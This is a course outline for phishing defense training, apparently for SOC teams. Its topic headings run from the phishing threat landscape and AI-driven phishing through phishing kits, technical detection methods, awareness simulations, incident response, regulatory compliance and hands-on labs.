|
1.1 Historical Perspective
- Evolution from basic email scams to sophisticated multi-channel attacks
- Timeline of significant phishing campaigns and their impact
- How threat actors have adapted to security controls
|
| Module 1:Introduction to Phishing Threat Landscape |
1.2 Current Phishing Landscape
- Global statistics and impact on organizations
- Industry-specific targeting patterns
- Geographic distribution of phishing infrastructure
- Economic impact of successful phishing campaigns
|
|
1.3 Current Trends in Phishing
- AI-Driven Phishing Attacks: ChatGPT, DeepSeek, LLaMA, and more
- Automated Spear Phishing: Hyper-personalized emails
- Business Email Compromise (BEC)
- Phishing-as-a-Service (PhaaS)
|
|
1.4 Phishing Attack Taxonomy
- Email-based phishing
- Spear phishing and whaling
- Clone phishing
- Smishing (SMS phishing)
- Vishing (voice phishing)
- QR code phishing
- Search engine phishing
- Social media phishing and impersonation
- Business Email Compromise (BEC)
- Hybrid phishing attacks
|
| Module 2:Anatomy of a Phishing Attack |
2.1 Phishing Kill Chain Analysis
- Reconnaissance: Domain spoofing, LinkedIn scraping, open-source intelligence (OSINT)
- Weaponization: Crafting payloads, malicious links, and attachments
- Delivery: Email, SMS (Smishing), Voice (Vishing), and Social Media Phishing
- Exploitation: Credential harvesting, malware deployment
- Installation & Command Control (C2): Establishing backdoor communications
- Action on Objectives: Data theft, financial fraud, lateral movement
|
|
2.2 Common Phishing Techniques
- Email Phishing: Tactics, indicators, and examples
- Spear Phishing: Targeted approach and personalization methods
- Clone Phishing: Replicating legitimate communications
- Whaling: Targeting C-Suite Executives
- Smishing (SMS-based): Mobile attack vectors
- Vishing (Voice-based): Social engineering over phone calls
- Social Media Impersonation: Brand and executive spoofing
|
|
3.1 How Threat Actors Use AI
- Content Generation with LLMs: GPT-4, Claude, Bard
- Natural language processing for creating convincing messages
- Automated Payload Generation: Multi-language phishing emails
- Hyper-Personalization Techniques: Real-time scraping of social media and company news
- Machine learning for target selection and customization
- Phishing Chatbots: Engaging targets interactively to gather more information
- Deepfake Voice Calls: Advanced vishing techniques
- Case studies of AI-enhanced phishing campaigns
|
| Module 3: AI-Driven Phishing Tactics |
3.2 AI Tools Used by Threat Actors
- Overview of accessible AI tools being weaponized
- Large Language Models (LLMs) for content generation
- AI-based translation tools for global targeting
- Voice cloning for executive impersonation
- Image generation for creating fake personas and scenarios
|
|
3.3 Detection and Defense against AI-based Phishing
- Pattern analysis of LLM-generated texts
- AI-based anomaly detection
- Real-time content analysis for linguistic markers
- AI detection limitations and blindspots
- Creating awareness around AI-generated content
- Technical controls specific to AI-powered phishing
- Developing organizational resilience against AI threats
|
|
4.1 Understanding Phishing Kits
- Components of phishing kits
- Open-source phishing kits and commercial offerings
- Modular design: HTML, PHP scripts, and data capture forms
- Plug-and-play kits vs. custom development
- Admin panels and management interfaces
- Evasion techniques built into kits
- Exfiltration methods and credential handling
- Detection Techniques: Fingerprinting common phishing kit signatures
|
|
4.2 Phishing-as-a-Service (PHaaS)
- Overview of PHaaS platforms
- Underground marketplace dynamics
- Pricing models and service offerings
- Dark Web marketplaces for phishing kits
- Subscription models and service tiers
- Customer support and infrastructure management
- Distribution channels and affiliate programs
- Case studies of prominent PHaaS operations
|
| Module 4: Phishing Kits and Infrastructure Analysis |
4.3 Hosting and Infrastructure
- Bulletproof hosting providers
- Compromised websites and legitimate infrastructure abuse
- Fast-flux networks and domain generation algorithms
- Temporary/disposable infrastructure strategies
- Content delivery networks (CDNs) abuse
|
|
4.4 Domain Registration Tactics
- Typosquatting and homograph attacks
- Domain aging and reputation building
- Subdomain abuse of legitimate domains
- TLD selection strategies
- Just-in-time domain registration patterns
|
|
4.5 Command and Control (C2) Analysis
- Understanding C2 mechanisms for phishing attacks
- Common TTPs: Domain Fronting, Bulletproof Hosting
- Advanced threat hunting techniques
|
|
5.1 Favicon Hash Analysis for Phishing Detection
- How phishing sites use real favicons to mimic legitimate brands
- Fundamentals of favicon fingerprinting
- Creating a favicon hash database of legitimate sites
- Using favicon hashes to fingerprint phishing sites
- Implementing automated favicon comparison tools
- Automated scanning methods
- Favicon analysis limitations and evasion techniques
- Integration with existing security stacks
|
|
5.2 Certificate Transparency Logs
- Leveraging CT logs to identify malicious domains
- Spotting suspicious SSL certificates
- SSL/TLS certificate analysis
- Domain reputation services and integration
|
| Module 5: Advanced Technical Detection Methods |
5.3 DNS Sinkholing and Passive DNS Analysis
- Tracking phishing domains through passive DNS
- Identifying malicious infrastructure
- Advanced URL parsing and anomaly detection
- WHOIS data analysis and registration patterns
- Historical DNS analysis for phishing detection
|
|
5.4 HTML and JavaScript Analysis
- Source code patterns indicative of phishing
- Obfuscation techniques and their detection
- Form data collection and exfiltration methods
- JavaScript-based evasion and anti-analysis techniques
- Automated tools for HTML/JS phishing detection
|
|
5.5 Email Header and Content Analysis
- SPF, DKIM, and DMARC record investigation
- Email header anomaly detection
- Content fingerprinting techniques
- Natural language processing for content analysis
- Sender behavior analysis and pattern recognition
|
|
5.6 Image-based Phishing Detection
- Logo detection and comparison through computer vision
- Visual similarity algorithms
- OCR (Optical Character Recognition) for image-based attacks
- Screenshot comparison with legitimate sites
- Perceptual hashing techniques
|
|
6.1 Designing Effective Phishing Simulations
- Developing realistic scenarios that mimic current phishing TTPs
- Creating simulations that match the organization’s threat model
- Tools and platforms for phishing simulations
- Customizing campaigns for different departments and risk levels
- Metrics and measurement methodologies
|
| Module 6: Phishing Simulation and Awareness Programs |
6.2 Tracking Employee Response and Improvement
- Establishing baselines for user susceptibility
- Measuring reporting rates vs. click rates
- Tracking improvement over time
- Analyzing departmental and role-based vulnerabilities
- Developing KPIs for awareness effectiveness
|
|
6.3 Building a Culture of Awareness and Vigilance
- Executive buy-in and leadership involvement
- Reward systems for reporting suspicious messages
- Creating a positive security culture
- Just-in-time training for users who fall for simulations
- Regular security communications and updates
|
|
6.4 Advanced Awareness Strategies
- Micro-learning and continuous education
- Gamification of security awareness
- Personalized awareness based on user behavior
- Role-specific training for high-value targets
- Measuring behavior change beyond simulation metrics
|
|
7.1 Building an Effective Phishing IR Plan
- Phishing-specific playbooks development
- Roles and responsibilities in phishing response
- Communication protocols during active campaigns
- Containment strategies for different phishing vectors
- Recovery and post-incident procedures
|
|
7.2 Real-time Incident Response
- Quarantine and isolation of compromised accounts
- Domain takedowns and reporting to ISPs
- Rapid analysis of phishing payloads
- Initial triage and analysis methodologies
- Prioritization frameworks for phishing reports
- Initial containment actions
- Determining attack scope and potential impact
- Parallel investigation techniques
|
| Module 7: Response and Remediation Strategies |
7.3 Evidence Collection and Forensics
- Preserving email evidence
- Web server logs and network traffic analysis
- Endpoint forensics for compromised systems
- Documenting the phishing infrastructure
- Chain of custody considerations
- Digital forensics for email headers, URLs, and phishing forms
|
|
7.4 Threat Intelligence Integration
- Leveraging threat intelligence in investigations
- Identifying campaign relationships and attribution
- Sharing indicators of compromise (IoCs)
- Participating in industry sharing groups
- Creating actionable intelligence from incidents
- Real-time feeds and IoCs (Indicators of Compromise)
- Integrating CTI into SIEM and EDR for proactive defense
|
|
7.5 Post-Incident Activities
- Root cause analysis for successful phishing attacks
- Measuring effectiveness of response
- Feedback loops to prevention measures
- Metrics and reporting for executive leadership
- Continuous improvement of phishing defenses
- Conducting lessons-learned sessions
- Updating threat models and playbooks
|
|
8.1 GDPR and Data Breach Notifications
- Understanding notification requirements when phishing leads to data breach
- Timeline requirements for reporting
- Documentation requirements for compliance
- Cross-border considerations for international organizations
|
|
8.2 CCPA Compliance for Phishing-Related Data Theft
- California-specific requirements
- Consumer notification processes
- Documentation and reporting requirements
- Potential penalties and enforcement actions
|
| Module 8: Compliance and Regulatory Considerations |
8.3 ISO 27001 and SOC 2 Considerations
- How phishing controls map to common frameworks
- Documentation requirements for certification
- Gap analysis methodologies
- Continuous compliance monitoring
|
|
8.4 Financial Sector Requirements
- PCI-DSS requirements related to phishing prevention
- FINRA and SEC guidelines for financial institutions
- Banking-specific reporting requirements
- Industry-specific frameworks and best practices
|
|
8.5 Healthcare Sector Requirements
- HIPAA considerations for phishing-related breaches
- Protected health information (PHI) considerations
- Sector-specific reporting requirements
- Patient notification requirements
|
|
9.1 Building and Training Specialized Phishing Analysis Teams
- Skill requirements and development paths
- Technical vs. behavioral analysis capabilities
- Training programs and certification paths
- Performance metrics for phishing analysts
- Building institutional knowledge repositories
|
| Module 9: SOC Team Management for Phishing Defense |
9.2 Tool Selection and Integration
- Email security gateway optimization
- Phishing simulation platforms
- SOAR integration for phishing response
- User reporting mechanisms
- Automated analysis and triage systems
|
|
9.3 Workflow Optimization
- Managing phishing report volume
- Automating repetitive analysis tasks
- Alert fatigue reduction strategies
- Integrating phishing response with broader SOC operations
- Service level agreements for phishing response
|
|
9.4 Metrics and Reporting
- Key performance indicators for phishing defense
- Executive-level reporting frameworks
- Measuring SOC effectiveness against phishing
- Trend analysis and predictive metrics
- Regulatory and compliance reporting requirements
|
| Module 10: Hands-On Labs and Practical Exercises |
10.1 Advanced Phishing Analysis Lab
- Real-world phishing email analysis
- Hands-on analysis of sophisticated phishing samples
- Phishing kit dissection and analysis
- Infrastructure tracking and takedown procedures
- Developing custom detection rules
- Threat hunting exercises for phishing campaigns
- Detection of AI-generated phishing attempts
- Building phishing detection models with YARA rules
|
|
|
